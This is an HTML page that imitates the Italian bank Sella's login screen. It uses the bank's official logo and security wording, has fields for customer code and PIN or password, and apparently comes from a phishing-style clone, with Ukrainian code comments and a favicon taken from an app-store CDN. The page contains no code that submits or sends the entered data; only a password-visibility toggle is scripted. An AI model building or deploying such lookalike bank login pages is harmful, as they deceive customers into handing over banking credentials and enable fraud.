<!DOCTYPE html>
<html lang="it">
<head>
  <meta charset="UTF-8">
  <meta name="viewport" content="width=device-width, initial-scale=1.0">
  <title>Sella Login</title>

  <link rel="icon" href="https://cdn6.aptoide.com/imgs/0/4/2/042eb0906e4687bdef19a48b1d9cfef7_icon.png" type="image/x-icon">
  <link rel="shortcut icon" href="https://cdn6.aptoide.com/imgs/0/4/2/042eb0906e4687bdef19a48b1d9cfef7_icon.png" type="image/x-icon">
 <link rel="apple-touch-icon" href="https://cdn6.aptoide.com/imgs/0/4/2/042eb0906e4687bdef19a48b1d9cfef7_icon.png">



 <link rel="preconnect" href="https://fonts.googleapis.com">
 <link rel="preconnect" href="https://fonts.gstatic.com" crossorigin>
 <link href="https://fonts.googleapis.com/css2?family=Manrope:wght@200..800&family=Montserrat+Alternates:ital,wght@0,100;0,200;0,300;0,400;0,500;0,600;0,700;0,800;0,900;1,100;1,200;1,300;1,400;1,500;1,600;1,700;1,800;1,900&family=Montserrat:ital,wght@0,100..900;1,100..900&display=swap" rel="stylesheet">
  <style>
    body {
      font-family: Arial, sans-serif;
      background: #f5f6fa;
      display: flex;
      justify-content: center;
      align-items: center;
      height: 100vh;
    }

    .modal {
      background: #fff;
      width: 358px;
      padding: 25px 30px;
      border: 1px solid #d6dbe6;
      border-radius: 6px;
      box-shadow: 0 3px 8px rgba(0,0,0,0.1);
    }

    .modal img {
      display: block;
      margin: 0 auto 10px;
      max-width: 120px;
    }

    .modal h2 {
      text-align: center;
      color: #0056b3;
      margin-bottom: 8px;
      font-size: 26px;
      font-weight: bold;
    }

    .modal p {
      text-align: center;
      font-size: 12px;
      color: #111;
      margin-bottom: 20px;
      font-family: "Manrope";
      line-height: 1.4em;
    }

    .form-group {
      margin-bottom: 15px;
    }

    .form-group label {
      display: block;
      font-size: 13px;
      font-family: "Manrope";
      margin-bottom: 5px;
      font-weight: 650;
      color: #222;
    }

    .form-group input {
      width: 94%;
      padding: 10px 12px;
      border: 1px solid #ccc;
      border-radius: 6px;
      font-size: 14px;
    }

    .password-wrapper {
      position: relative;
    }

    .password-wrapper svg {
      position: absolute;
      right: 10px;
      top: 65%;
      transform: translateY(-50%);
      width: 20px;
      height: 20px;
      cursor: pointer;
      color: #555;
    }

    .toggle-password.hidden {
      display: none;
    }

    .forgot {
      text-align: right;
      margin-bottom: 20px;
    }

    .forgot a {
      font-size: 13px;
      color: #339AEF;
      text-decoration: none;
      border-bottom: 1px solid #339AEF;
      font-weight: 550;
    padding: 0;
    line-height: 1; 
    display: inline-block; 
    }

    .btn {
      display: block;
      width: 358px;
      height: 52px;
      padding: 12px;
      background: #2B375F;
      color: #fff;
      font-weight: bold;
      border: none;
      border-radius: 6px;
      cursor: pointer;
      margin-bottom: 15px;
      font-weight: 750;
      font-family: 'Manrope';
      font-size: 14px;
    }

    .links {
      text-align: center;
      font-size: 13px;
      margin-bottom: 15px;

    }

    .links a {
      color: #339AEF;
      text-decoration: none;
      margin: 0 5px;
      border-bottom: 1px solid #339AEF;
    text-align: center;
    padding: 0;
    line-height: 1; 
    display: inline-block; 
    }

    .footer {
        padding-top: 20px;
        border-top: 1px solid #e5e5e5;
        line-height: 1; 
        display: inline-block; 
      font-size: 11px;
      color: #969696;
      text-align: center;

      display: block;
      justify-content: center;
      

    }

    .footer a {
      color: #03AC44;
      text-decoration: none;
      margin: 0,0 8px;
      text-align: center;
      border-bottom: 1px solid #03AC44;
      
    padding: 0;
    line-height: 1; 
    display: inline-block; 
    
    } .footer p{
        line-height: 0.8; 
        display: inline-block; 
      font-size: 11px;
      color: #969696;
      text-align: center;
      display: block;
      justify-content: center;
    }
  </style>
</head>
<body>
  <div class="modal">
    <img style="height: 29px; width: 80px;" src="https://www.sella.it/o/sella-theme/images/logo-sella.svg" alt="Sella Logo">
    <!-- <h2>Sella</h2> -->
    <p><b>Consigli utili per la sicurezza online</b><br>
    Ricorda che non ti contatteremo mai per chiedere informazioni sensibili al telefono, tramite email o sms, quali i tuoi codici personali di accesso (PIN, password, codici di conferma) o i numeri delle tue carte.</p>

    <div class="form-group">
      <label for="username">Codice Cliente o username</label>
      <input type="text" id="username" placeholder="">
    </div>

    <div class="form-group password-wrapper">
      <label for="password">PIN o password</label>
      <input type="password" id="password" placeholder="">
      
      <!-- Око -->
      <svg id="togglePassword" xmlns="http://www.w3.org/2000/svg" fill="none" viewBox="0 0 24 24" stroke="currentColor" stroke-width="2">
        <path stroke-linecap="round" stroke-linejoin="round" d="M2.458 12C3.732 7.943 7.523 5 12 
             5c4.477 0 8.268 2.943 9.542 7-1.274 
             4.057-5.065 7-9.542 7-4.477 
             0-8.268-2.943-9.542-7z"/>
        <circle cx="12" cy="12" r="3" />
      </svg>

      <!-- Закреслене око -->
      <svg id="togglePasswordSlash" class="toggle-password hidden" xmlns="http://www.w3.org/2000/svg" fill="none" viewBox="0 0 24 24" stroke="currentColor" stroke-width="2">
        <path stroke-linecap="round" stroke-linejoin="round" 
          d="M13.875 18.825A10.05 10.05 0 0112 
           19c-4.477 0-8.268-2.943-9.542-7a11.95 
           11.95 0 013.41-5.362M6.2 6.2A11.95 
           11.95 0 0112 5c4.477 0 8.268 2.943 
           9.542 7a11.95 11.95 0 01-2.293 
           3.592M6.2 6.2L4 4m0 0l16 16m-16-16l16 16"/>
      </svg>
    </div>

    <div class="forgot">
      <a href="#">Hai dimenticato i tuoi codici?</a>
    </div>

    <button class="btn">CONFERMA</button>

    <div class="links">
      <a href="#">Richiedi codici</a> - 
      <a href="#">Attiva codici</a>
    </div>

    <div class="footer">
      <p>Desideri maggiori informazioni o hai bisogno di assistenza?</p>
      <a href="#">Contatta l’assistenza Clienti</a> | 
      <a href="#">Informazioni sulla sicurezza</a>
    </div>
  </div>

  <script>
    const passwordInput = document.getElementById("password");
    const togglePassword = document.getElementById("togglePassword");
    const togglePasswordSlash = document.getElementById("togglePasswordSlash");

    togglePassword.addEventListener("click", () => {
      passwordInput.type = "text";
      togglePassword.classList.add("hidden");
      togglePasswordSlash.classList.remove("hidden");
    });

    togglePasswordSlash.addEventListener("click", () => {
      passwordInput.type = "password";
      togglePasswordSlash.classList.add("hidden");
      togglePassword.classList.remove("hidden");
    });
  </script>
</body>
</html>
